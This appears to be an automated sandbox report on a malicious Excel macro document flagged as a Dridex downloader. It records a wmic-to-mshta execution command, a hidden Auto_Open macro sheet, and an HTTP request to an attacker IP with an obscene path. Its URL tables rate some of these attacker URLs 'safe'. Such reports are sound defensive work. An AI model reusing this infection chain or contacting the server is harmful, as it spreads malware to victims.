      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ExchangeAutoDiscoverhttps:/
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.comOCSettingsCloudPolicyServiceAndroidUrlhttps://clients.config.office
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosd
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://wus2.contentsync.
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Azur
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.msomP
      Source: global trafficHTTP traffic detected: GET /mfkrmotherfuckeru6y82sasswhorehf9e HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: boobyHost: 157.230.250.107:8080

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\LZbir.rtf, type: DROPPED

      System Summary:

      barindex
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: 3762.xlsmInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: 3762.xlsmInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: EXCEL.EXE, 00000000.00000002.958453308.0000000001F85000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\LZbir.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\DefaultSTR=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program File
      Found obfuscated Excel 4.0 MacroShow sources
      Source: 3762.xlsmMacro extractor: Sheet: Macro1 high usage of CHAR() function: 22
      Source: 3762.xlsmMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
      Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="4" lowestEdited="4" rupBuild="4505"/><workbookPr defaultThemeVersion="124226"/><bookViews><workbookView xWindow="0" yWindow="30" windowWidth="19095" windowHeight="10230" firstSheet="1" activeTab="1"/></bookViews><sheets><sheet name="Macro1" sheetId="4" state="hidden" r:id="rId1"/><sheet name="Sheet1" sheetId="1" r:id="rId2"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Macro1!$V$1</definedName></definedNames><calcPr calcId="124519"/></workbook>
      Source: 3762.xlsmReversingLabs: Detection: 11%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\LZbir.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\LZbir.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\LZbir.rtf"Jump to behavior
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5948:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{3D29894B-19DC-43B6-B79E-106960825817} - OProcSessId.datJump to behavior
      Source: classification engineClassification label: mal88.troj.expl.evad.winXLSM@5/8@0/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: 3762.xlsmInitial sample: OLE zip file path = xl/media/image1.png
      Source: 3762.xlsmInitial sample: OLE zip file path = docProps/custom.xml
      Source: 9BB50000.0.drInitial sample: OLE zip file path = xl/media/image1.png
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: lzbir.rtfJump to behavior
      Source: unknownProcess created: cmd line: lzbir.rtf
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exe TID: 5504Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: EXCEL.EXE, 00000000.00000002.962647000.000000000D1C5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.964734424.000000000F0A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770102273.000000000F086000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674266697.000000000F086000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.964687883.000000000F086000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770127157.000000000F0A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674285267.000000000F0A0000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.699165622.000001C74C75B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.699138057.000001BF49969000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.827841761.000001C74C75B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.828157491.000001C74C75E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.962027653.000001C74C761000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958700779.000001BF4996A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
      Source: mshta.exe, 00000006.00000003.699165622.000001C74C75B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.827841761.000001C74C75B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.828157491.000001C74C75E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.962027653.000001C74C761000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWl
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: EXCEL.EXE, 00000000.00000002.960781152.00000000028C0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.959071532.000001BF49EB0000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: EXCEL.EXE, 00000000.00000002.960781152.00000000028C0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.959071532.000001BF49EB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.960781152.00000000028C0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.959071532.000001BF49EB0000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: EXCEL.EXE, 00000000.00000002.960781152.00000000028C0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.959071532.000001BF49EB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21DLL Side-Loading1Process Injection2Masquerading1OS Credential DumpingQuery Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting31Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution22Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting31NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      3762.xlsm11%ReversingLabsDocument-Word.Trojan.Heuristic

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhoreh0%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf90%Avira URL Cloudsafe
      https://o365auditrealtimeingestion.manage.office.comBearer0%Avira URL Cloudsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize0%Avira URL Cloudsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://outlook.office.comUP0%Avira URL Cloudsafe
      https://www.odwebp.svc.msomP0%Avira URL Cloudsafe
      http://schemas.open0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      http://157.230.250.100%Avira URL Cloudsafe
      http://157.230.250mObjec0%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswh0%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sassw0%Avira URL Cloudsafe
      https://o365auditrealtimeingestion.manage.office.comU0%Avira URL Cloudsafe
      https://substrate.office.com6Q0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer0%Avira URL Cloudsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://substrate.office.com5S0%Avira URL Cloudsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf0%Avira URL Cloudsafe
      https://api.onedrive.comMBI0%Avira URL Cloudsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.0%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y820%Avira URL Cloudsafe
      https://substrate.office.comP0%Avira URL Cloudsafe
      https://devnull.onenote.comMBI_SSL_SHORT0%Avira URL Cloudsafe
      https://of.230.250.107:8080/0%Avira URL Cloudsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://outlook.office.com$0%Avira URL Cloudsafe
      https://management.azure.comfR0%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://sr.outlook.office.net/ws/speech/recognize/assistaFEXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmpfalse
        		high
        http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehmshta.exe, 00000006.00000003.699264522.000001BF49937000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958529847.000001BF49937000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9mshta.exe, 00000006.00000002.957102724.000001BF498C7000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.699201112.000001BF498CD000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://shell.suite.office.com:1443EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
          		high
          https://autodiscover-s.outlook.com/EXCEL.EXE, 00000000.00000003.674210580.000000000F038000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965069920.000000000F178000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674386257.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826754049.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869975155.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678502130.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829204148.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826190690.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770810330.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811332568.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678232726.000000000F183000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
            		high
            https://o365auditrealtimeingestion.manage.office.comBearerEXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
              		high
              https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oauEXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpfalse
                		high
                https://cdn.entity.0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                • URL Reputation: safe
                		unknown
                https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorizeEXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                  		high
                  https://rpsticket.partnerservices.getmicrosoftkey.comEXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://lookup.onenote.com/lookup/geolocation/v1EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                    		high
                    https://outlook.office.comUPEXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.odwebp.svc.msomPEXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.openEXCEL.EXE, 00000000.00000003.811932990.0000000015B1C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811011891.0000000015B92000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811172377.0000000015BDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.810665104.0000000015AF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.810685067.0000000015B1C000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                      		high
